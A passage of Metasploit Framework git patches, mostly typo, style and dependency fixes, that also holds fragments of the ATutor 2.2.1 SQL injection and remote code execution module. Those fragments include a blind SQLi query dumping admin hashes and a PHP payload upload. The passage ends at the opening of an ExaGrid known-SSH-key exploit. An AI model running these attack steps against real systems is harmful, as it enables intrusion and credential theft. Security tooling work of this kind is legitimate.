"дэлььякатезшимя") + end + + ret + end + + + it "should delete unicode keys" do + ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + # getvalinfo should return nil for a non-existent key + ret &&= (valinfo.nil?) + ret &&= registry_deletekey(%q#HKCU\σονσλυσιονεμκυε#) + # Deleting the key should delete all its values + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_dword") + ret &&= (valinfo.nil?) + + ret + end + end end From d9d257cb1ab12668e4e98c2bf15642eeef9206cd Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 5 Apr 2016 19:23:00 -0500 Subject: [PATCH 668/686] Fix some things --- modules/exploits/multi/http/atutor_sqli.rb | 24 +++++++++++----------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index ede6c337de..8639ce0842 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a SQL Injection vulnerability and an authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authenication - and reach the administrators interface where they can upload malicious code. + and reach the administrator's interface where they can upload malicious code. }, 'License' => MSF_LICENSE, 'Author' => @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote [ [ 'CVE', '2016-2555' ], [ 'URL', 'http://www.atutor.ca/' ], # Official Website - [ 'URL', 'http://sourceincite.com/research/src-2016-08/'] # Advisory + [ 'URL', 'http://sourceincite.com/research/src-2016-08/' ] # Advisory ], 'Privileged' => false, 'Payload' => @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), + OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']) ],self.class) end @@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote def check # the only way to test if the target is vuln - if test_injection() + if test_injection return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe @@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote @plugin_name = Rex::Text.rand_text_alpha_lower(3) path = "#{@plugin_name}/#{@payload_name}.php" - # this content path is where the ATutor authors recommended to install it + # this content path is where the ATutor authors recommended installing it register_file_for_cleanup("#{@payload_name}.php", "/var/content/module/#{path}") zip_file.add_file(path, "") zip_file.pack @@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"), 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" - }, timeout = 0.1) + }, 0.1) end def upload_shell(cookie) @@ -99,20 +99,20 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", - 'cookie' => cookie, + 'cookie' => cookie }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection), - 'cookie' => cookie, + 'cookie' => cookie }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"), - 'cookie' => cookie, + 'cookie' => cookie }) return true end @@ -162,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote return res.body end - def dump_the_hash() + def dump_the_hash extracted_hash = "" sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)" login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli).to_i @@ -220,7 +220,7 @@ class MetasploitModule < Msf::Exploit::Remote end end - def test_injection() + def test_injection if generate_sql_and_test(do_true=true, do_test=true, sql=nil) if generate_sql_and_test(do_true=false, do_test=true, sql=nil) return true @@ -260,7 +260,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit print_status("Dumping the username and password hash...") - credz = dump_the_hash() + credz = dump_the_hash if credz print_good("Got the #{credz[0]}'s hash: #{credz[1]} !") admin_cookie = login(credz[0], credz[1]) From 11bf1018aaafeb432cfc9b3843c04fcf2b38473d Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 6 Apr 2016 14:20:41 -0500 Subject: [PATCH 669/686] Fix typo --- modules/exploits/multi/http/atutor_sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index 8639ce0842..693c045c1c 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution', 'Description' => %q{ This module exploits a SQL Injection vulnerability and an authentication weakness - vulnerability in ATutor. This essentially means an attacker can bypass authenication + vulnerability in ATutor. This essentially means an attacker can bypass authentication and reach the administrator's interface where they can upload malicious code. }, 'License' => MSF_LICENSE, From 22d08fdf396b868a51b087ac6a6eff2c367db05d Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 6 Apr 2016 14:47:43 -0500 Subject: [PATCH 670/686] Revert #6748, premature Gemfile* changes --- Gemfile | 17 +- Gemfile.lock | 339 ++++++++---------- app/concerns/mdm/workspace/boundary_range.rb | 60 ---- .../framework/rails_version_constraint.rb | 2 +- metasploit-framework.gemspec | 26 +- spec/models/mdm/workspace_spec.rb | 73 ---- 6 files changed, 162 insertions(+), 355 deletions(-) delete mode 100644 app/concerns/mdm/workspace/boundary_range.rb delete mode 100644 spec/models/mdm/workspace_spec.rb diff --git a/Gemfile b/Gemfile index ca9c6151ea..0a81128d1c 100755 --- a/Gemfile +++ b/Gemfile @@ -3,15 +3,6 @@ source 'https://rubygems.org' # spec.add_runtime_dependency '', [] gemspec name: 'metasploit-framework' -# rails-upgrade staging gems -gem 'metasploit-yard', github: 'rapid7/metasploit-yard', branch: 'staging/rails-upgrade' -gem 'metasploit-erd', github: 'rapid7/metasploit-erd', branch: 'staging/rails-upgrade' -gem 'yard-metasploit-erd', github: 'rapid7/yard-metasploit-erd', branch: 'staging/rails-upgrade' -gem 'metasploit-concern', github: 'rapid7/metasploit-concern', branch: 'staging/rails-upgrade' -gem 'metasploit-model', github: 'rapid7/metasploit-model', branch: 'staging/rails-upgrade' -gem 'metasploit_data_models', github: 'rapid7/metasploit_data_models', branch: 'staging/rails-upgrade' -gem 'metasploit-credential', github: 'rapid7/metasploit-credential', branch: 'staging/rails-upgrade' - # separate from test as simplecov is not run on travis-ci group :coverage do # code coverage for tests @@ -34,14 +25,14 @@ end group :development, :test do # automatically include factories from spec/factories - gem 'factory_girl_rails' + gem 'factory_girl_rails', '~> 4.5.0' # Make rspec output shorter and more useful - gem 'fivemat' + gem 'fivemat', '~> 1.3.1' # running documentation generation tasks and rspec tasks - gem 'rake' + gem 'rake', '>= 10.0.0' # Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the # environment is development - gem 'rspec-rails' + gem 'rspec-rails' , '~> 3.3' end group :test do diff --git a/Gemfile.lock b/Gemfile.lock index 7c1d1ad172..b887521766 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,208 +1,150 @@ -GIT - remote: git://github.com/rapid7/metasploit-concern.git - revision: 1081d8767b4c952b7f729fcf9725932e547e5541 - branch: staging/rails-upgrade - specs: - metasploit-concern (1.1.0) - activemodel (>= 4.1, < 4.2) - activesupport (>= 4.1, < 4.2) - railties (>= 4.1, < 4.2) - -GIT - remote: git://github.com/rapid7/metasploit-credential.git - revision: ce74ca0639c3a937f91f1138a7e998d9244ca3e0 - branch: staging/rails-upgrade - specs: - metasploit-credential (1.1.0) - metasploit-concern - metasploit-model - metasploit_data_models - pg - railties - rubyntlm - rubyzip (~> 1.1) - -GIT - remote: git://github.com/rapid7/metasploit-erd.git - revision: 279189d6dd850cb1e03916bef4793fd67dd0c415 - branch: staging/rails-upgrade - specs: - metasploit-erd (1.1.0) - activerecord (>= 4.1.0, < 4.2) - activesupport (>= 4.1.0, < 4.2) - rails-erd (~> 1.1) - -GIT - remote: git://github.com/rapid7/metasploit-model.git - revision: 20d11cb0a514a6353f1625c69d7ff82e60eb3320 - branch: staging/rails-upgrade - specs: - metasploit-model (1.1.0) - activemodel (>= 4.1, < 4.2) - activesupport (>= 4.1, < 4.2) - railties (>= 4.1, < 4.2) - -GIT - remote: git://github.com/rapid7/metasploit-yard.git - revision: 5db7698ebed25d775b94f0cbaef9ece4ae3255b3 - branch: staging/rails-upgrade - specs: - metasploit-yard (1.1.0) - rake - redcarpet - yard - -GIT - remote: git://github.com/rapid7/metasploit_data_models.git - revision: d36058007cff20de22976c5bcdf400b16988cd40 - branch: staging/rails-upgrade - specs: - metasploit_data_models (1.3.0) - activerecord (>= 4.1, < 4.2) - activesupport (>= 4.1, < 4.2) - arel-helpers - metasploit-concern - metasploit-model - pg - postgres_ext - railties (>= 4.1, < 4.2) - recog (~> 2.0) - -GIT - remote: git://github.com/rapid7/yard-metasploit-erd.git - revision: 6627ab547e86690272fcd39d8eb89fa4c6194d6e - branch: staging/rails-upgrade - specs: - yard-metasploit-erd (1.1.0) - metasploit-erd - rails-erd - yard - PATH remote: . specs: metasploit-framework (4.11.20) - actionpack (>= 4.1.0, < 4.2.0) - activerecord (>= 4.1.0, < 4.2.0) - activesupport (>= 4.1.0, < 4.2.0) + actionpack (>= 4.0.9, < 4.1.0) + activerecord (>= 4.0.9, < 4.1.0) + activesupport (>= 4.0.9, < 4.1.0) bcrypt filesize - jsobfu + jsobfu (~> 0.4.1) json - metasm - metasploit-model + metasm (~> 1.0.2) + metasploit-concern + metasploit-credential (= 1.1.0) + metasploit-model (= 1.1.0) metasploit-payloads (= 1.1.6) + metasploit_data_models (= 1.3.0) msgpack - network_interface + network_interface (~> 0.0.1) nokogiri octokit - openssl-ccm - packetfu - patch_finder + openssl-ccm (= 1.2.1) + packetfu (= 1.1.11) + patch_finder (>= 1.0.2) pcaprub - pg + pg (>= 0.11) railties rb-readline-r7 - recog + recog (= 2.0.14) redcarpet robots - rubyzip + rubyzip (~> 1.1) sqlite3 tzinfo GEM remote: https://rubygems.org/ specs: - actionpack (4.1.15) - actionview (= 4.1.15) - activesupport (= 4.1.15) + actionmailer (4.0.13) + actionpack (= 4.0.13) + mail (~> 2.5, >= 2.5.4) + actionpack (4.0.13) + activesupport (= 4.0.13) + builder (~> 3.1.0) + erubis (~> 2.7.0) rack (~> 1.5.2) rack-test (~> 0.6.2) - actionview (4.1.15) - activesupport (= 4.1.15) - builder (~> 3.1) - erubis (~> 2.7.0) - activemodel (4.1.15) - activesupport (= 4.1.15) - builder (~> 3.1) - activerecord (4.1.15) - activemodel (= 4.1.15) - activesupport (= 4.1.15) - arel (~> 5.0.0) - activesupport (4.1.15) + activemodel (4.0.13) + activesupport (= 4.0.13) + builder (~> 3.1.0) + activerecord (4.0.13) + activemodel (= 4.0.13) + activerecord-deprecated_finders (~> 1.0.2) + activesupport (= 4.0.13) + arel (~> 4.0.0) + activerecord-deprecated_finders (1.0.4) + activesupport (4.0.13) i18n (~> 0.6, >= 0.6.9) - json (~> 1.7, >= 1.7.7) - minitest (~> 5.1) + minitest (~> 4.2) + multi_json (~> 1.3) thread_safe (~> 0.1) - tzinfo (~> 1.1) - addressable (2.4.0) - arel (5.0.1.20140414130214) - arel-helpers (2.3.0) - activerecord (>= 3.1.0, < 6) - aruba (0.14.1) - childprocess (~> 0.5.6) - contracts (~> 0.9) - cucumber (>= 1.3.19) - ffi (~> 1.9.10) - rspec-expectations (>= 2.99) - thor (~> 0.19) + tzinfo (~> 0.3.37) + addressable (2.3.8) + arel (4.0.2) + arel-helpers (2.2.0) + activerecord (>= 3.1.0, < 5) + aruba (0.6.2) + childprocess (>= 0.3.6) + cucumber (>= 1.1.1) + rspec-expectations (>= 2.7.0) bcrypt (3.1.11) - builder (3.2.2) - capybara (2.6.2) - addressable + builder (3.1.4) + capybara (2.4.4) mime-types (>= 1.16) nokogiri (>= 1.3.3) rack (>= 1.0.0) rack-test (>= 0.5.4) xpath (~> 2.0) - childprocess (0.5.9) + childprocess (0.5.5) ffi (~> 1.0, >= 1.0.11) - choice (0.2.0) - coderay (1.1.1) - contracts (0.13.0) - cucumber (2.3.3) + coderay (1.1.0) + cucumber (1.3.19) builder (>= 2.1.2) - cucumber-core (~> 1.4.0) - cucumber-wire (~> 0.0.1) diff-lcs (>= 1.1.3) - gherkin (~> 3.2.0) + gherkin (~> 2.12) multi_json (>= 1.7.5, < 2.0) multi_test (>= 0.1.2) - cucumber-core (1.4.0) - gherkin (~> 3.2.0) - cucumber-rails (1.4.3) + cucumber-rails (1.4.2) capybara (>= 1.1.2, < 3) - cucumber (>= 1.3.8, < 3) - mime-types (>= 1.16, < 4) + cucumber (>= 1.3.8, < 2) + mime-types (>= 1.16, < 3) nokogiri (~> 1.5) - railties (>= 3, < 5) - cucumber-wire (0.0.1) + rails (>= 3, < 5) diff-lcs (1.2.5) docile (1.1.5) erubis (2.7.0) factory_girl (4.5.0) activesupport (>= 3.0.0) - factory_girl_rails (4.6.0) + factory_girl_rails (4.5.0) factory_girl (~> 4.5.0) railties (>= 3.0.0) faraday (0.9.2) multipart-post (>= 1.2, < 3) - ffi (1.9.10) + ffi (1.9.8) filesize (0.1.1) fivemat (1.3.2) - gherkin (3.2.0) + gherkin (2.12.2) + multi_json (~> 1.3) + hike (1.2.3) i18n (0.7.0) jsobfu (0.4.1) rkelly-remix (= 0.0.6) json (1.8.3) + mail (2.6.3) + mime-types (>= 1.16, < 3) metasm (1.0.2) + metasploit-concern (1.1.0) + activerecord (>= 4.0.9, < 4.1.0) + activesupport (>= 4.0.9, < 4.1.0) + railties (>= 4.0.9, < 4.1.0) + metasploit-credential (1.1.0) + metasploit-concern (~> 1.1) + metasploit-model (~> 1.1) + metasploit_data_models (~> 1.3) + pg + railties + rubyntlm + rubyzip (~> 1.1) + metasploit-model (1.1.0) + activemodel (>= 4.0.9, < 4.1.0) + activesupport (>= 4.0.9, < 4.1.0) + railties (>= 4.0.9, < 4.1.0) metasploit-payloads (1.1.6) + metasploit_data_models (1.3.0) + activerecord (>= 4.0.9, < 4.1.0) + activesupport (>= 4.0.9, < 4.1.0) + arel-helpers + metasploit-concern (~> 1.1) + metasploit-model (~> 1.1) + pg + postgres_ext + railties (>= 4.0.9, < 4.1.0) + recog (~> 2.0) method_source (0.8.2) - mime-types (3.0) - mime-types-data (~> 3.2015) - mime-types-data (3.2016.0221) + mime-types (2.6.1) mini_portile2 (2.0.0) - minitest (5.8.4) + minitest (4.7.5) msgpack (0.7.4) multi_json (1.11.2) multi_test (0.1.2) @@ -210,8 +152,8 @@ GEM network_interface (0.0.1) nokogiri (1.6.7.2) mini_portile2 (~> 2.0.0.rc2) - octokit (4.3.0) - sawyer (~> 0.7.0, >= 0.5.3) + octokit (4.2.0) + sawyer (~> 0.6.0, >= 0.5.3) openssl-ccm (1.2.1) packetfu (1.1.11) network_interface (~> 0.0) @@ -224,67 +166,78 @@ GEM activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) - pry (0.10.3) + pry (0.10.1) coderay (~> 1.1.0) method_source (~> 0.8.1) slop (~> 3.4) rack (1.5.5) rack-test (0.6.3) rack (>= 1.0) - rails-erd (1.4.6) - activerecord (>= 3.2) - activesupport (>= 3.2) - choice (~> 0.2.0) - ruby-graphviz (~> 1.2) - railties (4.1.15) - actionpack (= 4.1.15) - activesupport (= 4.1.15) + rails (4.0.13) + actionmailer (= 4.0.13) + actionpack (= 4.0.13) + activerecord (= 4.0.13) + activesupport (= 4.0.13) + bundler (>= 1.3.0, < 2.0) + railties (= 4.0.13) + sprockets-rails (~> 2.0) + railties (4.0.13) + actionpack (= 4.0.13) + activesupport (= 4.0.13) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (11.1.2) + rake (10.4.2) rb-readline-r7 (0.5.2.0) - recog (2.0.19) + recog (2.0.14) nokogiri redcarpet (3.3.4) rkelly-remix (0.0.6) robots (0.10.1) - rspec-core (3.4.4) - rspec-support (~> 3.4.0) - rspec-expectations (3.4.0) + rspec-core (3.3.2) + rspec-support (~> 3.3.0) + rspec-expectations (3.3.1) diff-lcs (>= 1.2.0, < 2.0) - rspec-support (~> 3.4.0) - rspec-mocks (3.4.1) + rspec-support (~> 3.3.0) + rspec-mocks (3.3.2) diff-lcs (>= 1.2.0, < 2.0) - rspec-support (~> 3.4.0) - rspec-rails (3.4.2) + rspec-support (~> 3.3.0) + rspec-rails (3.3.3) actionpack (>= 3.0, < 4.3) activesupport (>= 3.0, < 4.3) railties (>= 3.0, < 4.3) - rspec-core (~> 3.4.0) - rspec-expectations (~> 3.4.0) - rspec-mocks (~> 3.4.0) - rspec-support (~> 3.4.0) - rspec-support (3.4.1) - ruby-graphviz (1.2.2) + rspec-core (~> 3.3.0) + rspec-expectations (~> 3.3.0) + rspec-mocks (~> 3.3.0) + rspec-support (~> 3.3.0) + rspec-support (3.3.0) rubyntlm (0.6.0) rubyzip (1.2.0) - sawyer (0.7.0) - addressable (>= 2.3.5, < 2.5) + sawyer (0.6.0) + addressable (~> 2.3.5) faraday (~> 0.8, < 0.10) - shoulda-matchers (3.1.1) - activesupport (>= 4.0.0) - simplecov (0.11.2) + shoulda-matchers (2.8.0) + activesupport (>= 3.0.0) + simplecov (0.9.2) docile (~> 1.1.0) - json (~> 1.8) - simplecov-html (~> 0.10.0) - simplecov-html (0.10.0) + multi_json (~> 1.0) + simplecov-html (~> 0.9.0) + simplecov-html (0.9.0) slop (3.6.0) + sprockets (2.12.3) + hike (~> 1.2) + multi_json (~> 1.0) + rack (~> 1.0) + tilt (~> 1.1, != 1.3.0) + sprockets-rails (2.2.4) + actionpack (>= 3.0) + activesupport (>= 3.0) + sprockets (>= 2.8, < 4.0) sqlite3 (1.3.11) thor (0.19.1) thread_safe (0.3.5) - timecop (0.8.1) - tzinfo (1.2.2) - thread_safe (~> 0.1) + tilt (1.4.1) + timecop (0.7.3) + tzinfo (0.3.45) xpath (2.0.0) nokogiri (~> 1.3) yard (0.8.7.6) @@ -295,22 +248,18 @@ PLATFORMS DEPENDENCIES aruba cucumber-rails - factory_girl_rails - fivemat - metasploit-concern! - metasploit-credential! - metasploit-erd! + factory_girl_rails (~> 4.5.0) + fivemat (~> 1.3.1) metasploit-framework! - metasploit-model! - metasploit-yard! - metasploit_data_models! octokit (~> 4.0) pry - rake + rake (>= 10.0.0) redcarpet - rspec-rails + rspec-rails (~> 3.3) shoulda-matchers simplecov timecop yard - yard-metasploit-erd! + +BUNDLED WITH + 1.11.2 diff --git a/app/concerns/mdm/workspace/boundary_range.rb b/app/concerns/mdm/workspace/boundary_range.rb deleted file mode 100644 index ee68038362..0000000000 --- a/app/concerns/mdm/workspace/boundary_range.rb +++ /dev/null @@ -1,60 +0,0 @@ -module Mdm::Workspace::BoundaryRange - extend ActiveSupport::Concern - - included do - # - # Validations - # - - validate :boundary_must_be_ip_range - - # - # Instance Methods - # - - # If {#limit_to_network} is disabled, this will always return `true`. - # Otherwise, return `true` only if all of the given IPs are within the - # project {#boundary boundaries}. - - # - # @param ips [String] IP range(s) - # @return [true] if actions on ips are allowed. - # @return [false] if actions are not allowed on ips. - def allow_actions_on?(ips) - return true unless limit_to_network - return true unless boundary - return true if boundary.empty? - boundaries = Shellwords.split(boundary) - return true if boundaries.empty? # It's okay if there is no boundary range after all - given_range = Rex::Socket::RangeWalker.new(ips) - return false unless given_range # Can't do things to nonexistant IPs - allowed = false - boundaries.each do |boundary_range| - ok_range = Rex::Socket::RangeWalker.new(boundary) - allowed = true if ok_range.include_range? given_range - end - return allowed - end - - # Validates that {#boundary} is {#valid_ip_or_range? a valid IP address or - # IP address range}. Due to this not being tested before it was moved here - # from Mdm, the default workspace does not validate. We therefore don't - # validate boundaries of workspaces that don't use them. - # - # @return [void] - def boundary_must_be_ip_range - errors.add(:boundary, "must be a valid IP range") unless !limit_to_network || valid_ip_or_range?(boundary) - end - - private - - # Returns whether `string` is a valid IP address or IP address range. - # - # @return [true] if valid IP address or IP address range. - # @return [false] otherwise. - def valid_ip_or_range?(string) - range = Rex::Socket::RangeWalker.new(string) - range && range.ranges && range.ranges.any? - end - end -end diff --git a/lib/metasploit/framework/rails_version_constraint.rb b/lib/metasploit/framework/rails_version_constraint.rb index 8f0500189d..6258becfb0 100644 --- a/lib/metasploit/framework/rails_version_constraint.rb +++ b/lib/metasploit/framework/rails_version_constraint.rb @@ -5,7 +5,7 @@ module Metasploit module RailsVersionConstraint # The Metasploit ecosystem is not yet ready for Rails 4.1: - RAILS_VERSION = [ '>= 4.1.0', '< 4.2.0' ] + RAILS_VERSION = [ '>= 4.0.9', '< 4.1.0' ] end end end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 3d1b102eb2..31874f7c22 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -55,45 +55,45 @@ Gem::Specification.new do |spec| # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) spec.add_runtime_dependency 'bcrypt' # Needed for Javascript obfuscation - spec.add_runtime_dependency 'jsobfu' + spec.add_runtime_dependency 'jsobfu', '~> 0.4.1' # Needed for some admin modules (scrutinizer_add_user.rb) spec.add_runtime_dependency 'json' # Metasm compiler/decompiler/assembler - spec.add_runtime_dependency 'metasm' + spec.add_runtime_dependency 'metasm', '~> 1.0.2' # Metasploit::Concern hooks - #spec.add_runtime_dependency 'metasploit-concern' + spec.add_runtime_dependency 'metasploit-concern' # Metasploit::Credential database models - #spec.add_runtime_dependency 'metasploit-credential', '1.1.0' + spec.add_runtime_dependency 'metasploit-credential', '1.1.0' # Database models shared between framework and Pro. - #spec.add_runtime_dependency 'metasploit_data_models', '1.3.0' + spec.add_runtime_dependency 'metasploit_data_models', '1.3.0' # Things that would normally be part of the database model, but which # are needed when there's no database - spec.add_runtime_dependency 'metasploit-model' + spec.add_runtime_dependency 'metasploit-model', '1.1.0' # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.1.6' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. - spec.add_runtime_dependency 'network_interface' + spec.add_runtime_dependency 'network_interface', '~> 0.0.1' # Needed by anemone crawler spec.add_runtime_dependency 'nokogiri' # Needed by db.rb and Msf::Exploit::Capture - spec.add_runtime_dependency 'packetfu' + spec.add_runtime_dependency 'packetfu', '1.1.11' # For sniffer and raw socket modules spec.add_runtime_dependency 'pcaprub' # Needed for module caching in Mdm::ModuleDetails - spec.add_runtime_dependency 'pg' + spec.add_runtime_dependency 'pg', '>= 0.11' # Run initializers for metasploit-concern, metasploit-credential, metasploit_data_models Rails::Engines spec.add_runtime_dependency 'railties' # required for OS fingerprinting - spec.add_runtime_dependency 'recog' + spec.add_runtime_dependency 'recog', '2.0.14' # required for bitlocker fvek extraction - spec.add_runtime_dependency 'openssl-ccm' + spec.add_runtime_dependency 'openssl-ccm', '1.2.1' # Needed for documentation generation spec.add_runtime_dependency 'octokit' spec.add_runtime_dependency 'redcarpet' # Needed for Microsoft patch finding tool (msu_finder) - spec.add_runtime_dependency 'patch_finder' + spec.add_runtime_dependency 'patch_finder', '>= 1.0.2' # rb-readline doesn't work with Ruby Installer due to error with Fiddle: # NoMethodError undefined method `dlopen' for Fiddle:Module @@ -106,7 +106,7 @@ Gem::Specification.new do |spec| # Needed by anemone crawler spec.add_runtime_dependency 'robots' # Needed by some modules - spec.add_runtime_dependency 'rubyzip' + spec.add_runtime_dependency 'rubyzip', '~> 1.1' # Needed for some post modules spec.add_runtime_dependency 'sqlite3' # required for Time::TZInfo in ActiveSupport diff --git a/spec/models/mdm/workspace_spec.rb b/spec/models/mdm/workspace_spec.rb deleted file mode 100644 index dafbf541d4..0000000000 --- a/spec/models/mdm/workspace_spec.rb +++ /dev/null @@ -1,73 +0,0 @@ -RSpec.describe Mdm::Workspace, type: :model do - subject(:workspace) do - Mdm::Workspace.new - end - - context 'validations' do - context 'boundary' do - let(:boundary) do - nil - end - - let(:error) do - 'must be a valid IP range' - end - - context 'when the workspace is limited to a network' do - before(:example) do - workspace.boundary = boundary - workspace.limit_to_network = true - workspace.valid? - end - - it 'should validate using #valid_ip_or_range?' do - expect(workspace).to receive(:valid_ip_or_range?).with(boundary).and_return(false) - - workspace.valid? - end - - context 'with valid IP' do - let(:boundary) do - '192.168.0.1' - end - - it 'should not record an error' do - expect(workspace.errors[:boundary]).not_to include(error) - end - end - - context 'with valid range' do - let(:boundary) do - '192.168.0.1/24' - end - - it 'should not record an error' do - expect(workspace.errors[:boundary]).not_to include(error) - end - end - - context 'with invalid IP or range' do - let(:boundary) do - '192.168' - end - - it 'should record error that boundary must be a valid IP range' do - expect(workspace).not_to be_valid - expect(workspace.errors[:boundary]).to include(error) - end - end - end - - context 'when the workspace is not network limited' do - before(:example) do - workspace.boundary = boundary - workspace.valid? - end - - it 'should not care about the value of the boundary' do - expect(workspace.errors[:boundary]).not_to include(error) - end - end - end - end -end From ac051bda7f9d14dd58db75f5200b1f98d250a722 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 6 Apr 2016 15:28:54 -0500 Subject: [PATCH 671/686] Add check is_routable?, and change netmask if needed --- modules/post/windows/manage/autoroute.rb | 30 +++++++++++++++++------- 1 file changed, 21 insertions(+), 9 deletions(-) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index 0f66a86c1d..8d2670ca37 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -159,31 +159,43 @@ class MetasploitModule < Msf::Post Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session) end + def is_routable?(route) + if route.subnet =~ /^224\.|127\./ + return false + elsif route.subnet =~ /[\d\.]+\.0$/ + return false + elsif route.subnet == '0.0.0.0' + return false + elsif route.subnet == '255.255.255.255' + return false + end + + true + end + # This function will search for valid subnets on the target and attempt # add a route to each. (Operation from auto_add_route plugin.) # # @return [void] A useful return value is not expected here def autoadd_routes switch_board = Rex::Socket::SwitchBoard.instance - print_status("Searcing for subnets to autoroute.") + print_status("Searching for subnets to autoroute.") found = false session.net.config.each_route do | route | - # Remove multicast and loopback interfaces - next if route.subnet =~ /^(224\.|127\.)/ - next if route.subnet == '0.0.0.0' - next if route.netmask == '255.255.255.255' + next unless is_routable?(route) if !switch_board.route_exists?(route.subnet, route.netmask) begin - if Rex::Socket::SwitchBoard.add_route(route.subnet, route.netmask, session) - print_good("Route added to subnet #{route.subnet}/#{route.netmask}") + netmask = route.netmask == '255.255.255.255' ? '255.255.255.0' : route.netmask + if Rex::Socket::SwitchBoard.add_route(route.subnet, netmask, session) + print_good("Route added to subnet #{route.subnet}/#{netmask}") found = true else - print_error("Could not add route to subnet #{route.subnet}/#{route.netmask}") + print_error("Could not add route to subnet #{route.subnet}/#{netmask}") end rescue ::Rex::Post::Meterpreter::RequestError => error - print_error("Could not add route to subnet #{route.subnet}/(#{route.netmask})") + print_error("Could not add route to subnet #{route.subnet}/(#{netmask})") print_error(error.to_s) end end From 2563634dce40ff86a4eb12be46b0a2d1248e6da9 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 6 Apr 2016 22:03:31 -0500 Subject: [PATCH 672/686] Fix inverted logic introduced by #6734 MS-385 --- lib/msf/core/exploit.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index b01729ed03..e976d84e97 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1197,7 +1197,7 @@ class Exploit < Msf::Module # value can be one of the Handler::constants. # def handler(*args) - unless payload_instance && handler_enabled? + if payload_instance && handler_enabled? payload_instance.handler(*args) end end From 87d59a9bfb8ff8b45e4106f2ff545e786342c812 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 7 Apr 2016 04:17:43 -0500 Subject: [PATCH 673/686] Add exploit for ExaGrid known credentials --- .../linux/ssh/exagrid_known_privkey.rb | 184 ++++++++++++++++++ 1 file changed, 184 insertions(+) create mode 100644 modules/exploits/linux/ssh/exagrid_known_privkey.rb diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb new file mode 100644 index 0000000000..a58c8a7224 --- /dev/null +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -0,0 +1,184 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' +#load 'lib/msf/core/handler/find_port.rb' +#load 'lib/msf/core/handler.rb' +#load 'lib/msf/core/exploit.rb' + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, { + 'Name' => 'ExaGrid Known SSH Key and Default Password', + 'Description' => %q{ + ExaGrid ships a public/private key pair on their backup appliances + that allows passwordless authentication to other ExaGrid appliances. + Since the private key is easily retrievable, an attacker can use it to + gain unauthorized remote access as root. Additionally, this module + will also attempt to use the default 